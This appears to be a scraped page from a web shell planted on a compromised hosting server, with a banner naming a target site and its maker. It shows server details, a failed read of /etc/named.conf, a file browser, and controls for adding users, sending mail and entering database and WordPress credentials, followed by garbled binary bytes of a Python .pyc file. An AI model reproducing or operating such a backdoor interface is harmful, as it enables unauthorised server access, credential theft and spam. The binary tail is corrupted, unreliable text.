System
:
Linux server195.web-hosting.com 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Software
:
LiteSpeed
Server
:
198.54.115.201
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python2.7
/
compiler
/
216.73.216.102
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for sunrisetraders.in made by tabagkayu.
Folder Name
File Name
File Content
File
syntax.pyc
� {fc @ s? d Z d d l m Z m Z d d � Z d d d � � YZ d S( s8 Check for errs in the AST. The Python parser does not catch all syntax errors. Others, like assignments with invalid targets, are caught in the code generation phase. The compiler package catches some errors in the transformer module. But it seems clearer to write checkers that use the AST to detect errors. i����( t astt walkc C s t | � } t | | � | j S( N( t SyntaxErrorCheckerR t errors( t treet multit v( ( s'